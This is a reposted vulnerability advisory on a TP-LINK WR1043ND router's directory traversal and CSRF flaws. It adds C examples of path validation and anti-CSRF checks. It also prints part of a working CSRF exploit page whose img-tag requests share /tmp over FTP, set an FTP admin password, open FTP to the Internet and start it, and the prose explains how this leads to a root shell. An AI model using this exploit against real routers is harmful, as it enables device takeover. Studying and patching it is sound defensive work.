WR1043ND 'shareFolderName' Parameter Directory Traversal Vulnerability

Published: 2013-04-12
Updated: 2013-04-25

Affected systems:
TP-LINK TL-WR1043ND V1_120405
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 59448
CVE(CAN) ID: CVE-2013-2644

The TP-LINK TL-WR1043ND is a wireless router.
 
The page userRpm/NasFtpCfgRpm.htm in TP-LINK TL-WR1043N firmware TL-WR1043ND_V1_120405 does not properly validate its input and is subject to a directory traversal vulnerability: an attacker can carry out a directory traversal attack by supplying a crafted 'shareFolderName' parameter.
 
Combined with a separate cross-site request forgery vulnerability in the TP-LINK TL-WR1043N (CVE-2013-2645), this directory traversal vulnerability lets an attacker upload a command file to the TP-LINK device and have it executed.
 
<*Source: Michail Sajdak

  Link: ?vuldb.8478
 *>
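The fix for the traversal class described above is to never let a user-supplied share name choose an absolute location on the device: normalise it, refuse anything that climbs above the share root, and only then join it to that root. The following C code is an added example written for this page; it is not TP-LINK's firmware code. NAS_ROOT ("/var/usbdisk"), the function names and the sample inputs are assumptions made for illustration; the "/tmp/." value is the one the proof of concept below submits as the share path.

```c
/* Added example (not TP-LINK's code): validating a user-supplied share
 * folder name before it is joined to the NAS root directory.
 * NAS_ROOT is an assumed placeholder for the directory all shares must stay under. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define NAS_ROOT "/var/usbdisk"

/* Lexically normalise a path: skip empty and "." segments and resolve "..".
 * Returns 0 on success, -1 if ".." would climb above the root or out is too
 * small.  The result is "" for the root itself, otherwise "/seg/seg...". */
static int normalize_path(const char *in, char *out, size_t outsz) {
    size_t len = 0;
    const char *p = in;
    if (outsz == 0) return -1;
    out[0] = '\0';
    while (*p) {
        while (*p == '/') p++;                 /* skip one or more separators */
        if (!*p) break;
        const char *seg = p;
        while (*p && *p != '/') p++;
        size_t seglen = (size_t)(p - seg);
        if (seglen == 1 && seg[0] == '.') continue;
        if (seglen == 2 && seg[0] == '.' && seg[1] == '.') {
            if (len == 0) return -1;           /* ".." above the root: reject */
            while (len > 0 && out[len - 1] != '/') len--;   /* drop last segment */
            if (len > 0) len--;                /* drop its leading slash */
            out[len] = '\0';
            continue;
        }
        if (len + 1 + seglen + 1 > outsz) return -1;
        out[len++] = '/';
        memcpy(out + len, seg, seglen);
        len += seglen;
        out[len] = '\0';
    }
    return 0;
}

/* Build the on-disk directory for a share name.  The name is always treated as
 * relative to NAS_ROOT, so an absolute value such as "/tmp/." cannot select a
 * directory outside the root.  Returns 1 and fills out on success, 0 on rejection. */
int resolve_share_folder(const char *share_name, char *out, size_t outsz) {
    char rel[256];
    if (share_name == NULL || share_name[0] == '\0') return 0;
    if (strlen(share_name) >= sizeof rel) return 0;
    if (normalize_path(share_name, rel, sizeof rel) != 0) return 0;
    if (rel[0] == '\0') return 0;              /* sharing the root itself: refuse */
    int n = snprintf(out, outsz, "%s%s", NAS_ROOT, rel);
    if (n < 0 || (size_t)n >= outsz) return 0;
    return 1;
}

/* Helpers: 1 if name is accepted and resolves to expected / 1 if name is rejected. */
int share_resolves_to(const char *name, const char *expected) {
    char buf[512];
    return resolve_share_folder(name, buf, sizeof buf) == 1 && strcmp(buf, expected) == 0;
}
int share_rejected(const char *name) {
    char buf[512];
    return resolve_share_folder(name, buf, sizeof buf) == 0;
}

int main(void) {
    /* Constructed inputs: a normal share, the PoC's "/tmp/." value, traversal attempts. */
    const char *samples[] = { "music", "/tmp/.", "../../tmp", "a/../../etc", "docs/../photos", "." };
    char buf[512];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        if (resolve_share_folder(samples[i], buf, sizeof buf))
            printf("%-16s -> accepted: %s\n", samples[i], buf);
        else
            printf("%-16s -> rejected\n", samples[i]);
    }
    return 0;
}
```

The lexical check is deliberately applied before the directory is touched, so it also covers names that do not exist yet. It does not see through symbolic links; once the directory exists, resolving it with realpath() and re-checking the NAS_ROOT prefix closes that gap.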

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users assume all risk!
Michail Sajdak () provided the following test method:
 
Referenced from
 
 
Prerequisites
 In the following proof of concept attack, we assume that a TP-LINK WR1043N device administrator with an active management session established with the router has browsed to a malicious web page. Once there, a series of automatic form submissions take place, one after the other, to the Administrator's router, from the Administrator's browser. Since the Administrator has a current session established with the TP-LINK router, the form submissions are processed.
 
Test steps
 The malicious page (Figure 1) makes six requests to the WR1043N using HTML img tags. Requests one through four share the /tmp directory over the FTP server, change the password for admin to "ise", make the FTP server Internet-accessible, and start the FTP server, respectively. Request five enables the bandwidth control option of the router; its only purpose is to ensure that request six actually causes the tc.sh file to be rerun. After request five, the attacker (presumably using a script triggered by the victim accessing the attack page) connects to the router's FTP server and continuously uploads a replacement tc.sh file containing malicious commands. Request six disables the bandwidth control option of the router. After receiving request six, due to the race condition: (1) the web interface writes a new copy of tc.sh, (2) the attacker overwrites tc.sh using FTP, and (3) the web interface executes tc.sh.
 
Consequences
 After obtaining root shell access, an attacker could perform any attack imaginable by compiling and uploading additional commands using the FTP server.
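The chain above works only because the router accepts configuration changes from plain GET requests that an img tag on a foreign page can trigger, and because nothing ties the request to the page the administrator is actually looking at. The C function below is an added example written for this page, not TP-LINK's code; it shows the three checks a router's web handler would apply before acting on a state-changing request: method must be POST, the Origin (or, failing that, Referer) header must name the router itself, and the form must carry the per-session anti-CSRF token. ROUTER_ORIGIN uses the 192.168.1.1 address from the proof of concept; the struct fields, header handling and token values are assumptions for illustration.

```c
/* Added example (not TP-LINK's code): request-level checks that would have
 * refused the img-tag submissions in the proof of concept.
 * Header names, token format and the origin string are assumptions. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define ROUTER_ORIGIN "http://192.168.1.1"   /* router's own origin, as in the PoC URLs */

/* Constant-time comparison so a token mismatch leaks nothing through timing. */
static int tokens_equal(const char *a, const char *b) {
    size_t la = strlen(a), lb = strlen(b);
    if (la != lb) return 0;                    /* token length is not secret */
    unsigned char diff = 0;
    for (size_t i = 0; i < la; i++) diff |= (unsigned char)(a[i] ^ b[i]);
    return diff == 0;
}

/* Minimal view of an incoming request; any field may be NULL when absent. */
struct request {
    const char *method;      /* "GET" or "POST" */
    const char *origin;      /* Origin header */
    const char *referer;     /* Referer header, used only when Origin is absent */
    const char *form_token;  /* anti-CSRF token submitted with the form */
};

/* Returns 1 if a state-changing request may be processed, 0 otherwise.
 * session_token is the token bound to the administrator's session cookie. */
int csrf_request_allowed(const struct request *r, const char *session_token) {
    /* 1. State changes only via POST: an <img src=...> can only issue GET. */
    if (r->method == NULL || strcmp(r->method, "POST") != 0) return 0;

    /* 2. The request must originate from the router's own pages. */
    const char *src = r->origin ? r->origin : r->referer;
    if (src == NULL) return 0;
    size_t n = strlen(ROUTER_ORIGIN);
    if (strncmp(src, ROUTER_ORIGIN, n) != 0) return 0;
    if (src[n] != '\0' && src[n] != '/') return 0;   /* reject "http://192.168.1.1.evil.example" */

    /* 3. The form must carry the token tied to this session. */
    if (r->form_token == NULL || session_token == NULL) return 0;
    return tokens_equal(r->form_token, session_token);
}

/* Convenience wrapper so callers (and tests) need not build the struct. */
int check_request(const char *method, const char *origin, const char *referer,
                  const char *form_token, const char *session_token) {
    struct request r = { method, origin, referer, form_token };
    return csrf_request_allowed(&r, session_token);
}

int main(void) {
    /* Constructed requests: the PoC-style cross-site GET and a legitimate admin POST. */
    printf("cross-site GET, no token : %s\n",
           check_request("GET", "http://attacker.example", NULL, NULL, "s3ss10n") ? "allowed" : "refused");
    printf("same-origin POST + token : %s\n",
           check_request("POST", "http://192.168.1.1", NULL, "s3ss10n", "s3ss10n") ? "allowed" : "refused");
    return 0;
}
```

Any one of the three checks alone stops the img-tag technique; together they also cover a forged POST from a cross-site form, a missing Origin header on old browsers (Referer fallback), and a guessed token. The token should be generated per session from a CSPRNG and never placed in a URL.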
 
Figure 1
 ------------------------------------------------------------------------------------
 <html>
 <head>
 <title>TP-LINK TL-WR1043ND CSRF</title>
 <!--
 # TP-LINK WR1043ND CSRF, Directory Traversal, Race Condition
 # Firmware: 3.13.12 Build 120405 Rel.33996n
 # Discovered and Exploited By:
 #  Jacob Holcomb of Independent Security Evaluators
 # Re-Implemented and Race Condition Added By:
 #  Jacob Thompson of Independent Security Evaluators
 # CVE: Directory Traversal - CVE-2013-2644, CSRF - CVE-2013-2645
 #
 #
 -->
 </head>
 <body>
 <script type="application/javascript">
 
// STEP 1 - Share /tmp over the FTP Server
 function csrf1() {
 document.write('<img src="http://192.168.1.1/userRpm/NasFtpCfgRpm.htm?
    displayName=tmp&shareEntire=%2Ftmp%2F.&Save=Save&selPage=0&Page=1&subpage=2
        &no_use_para_just_fix_ie_sub_bug=">');
 window.setTimeout(csrf2, 1000);
 }
 
// STEP 2 - Change FTP Admin User Password to "ise"
 function csrf2() {
 document.write('CSRF2...<br>');
 document.write('<img src="http://192.168.1.1/userRpm/NaSUSErAdvRpm.htm?
    nas_admin_pwd=ise
    &nas_admin_confirm_pwd=ise&nas_admin_authority=1&nas_admin_ftp=1&Modify=0
    &Save=Save">');
 window.setTimeout(csrf3, 1000);
 }
 
// STEP 3 - Enable WAN Access to FTP Server
 function csrf3() {
 document.write('CSRF3...<br>');
 document.write('<img src="http://192.168.1.1/userRpm/NasFtpCfgRpm.htm?internetA=1
    &service_port=21&save=Save">');
 window.setTimeout(csrf4, 1000);
 }
 
// STEP 4 - Start FTP Server
 function csrf4() {
 document.write('CSRF4...<br>');
 document.write('<img src="https://192.168.1.1/userRpm/NasFtpCfgRpm.htm?startFtp=1"
   >');
 window.setTimeout(csrf5, 1000);
 }
 

Content copyright notice: unless otherwise noted, all articles are original to this site.

When reposting, cite the source: http://www.heiqu.com/ppgwz.html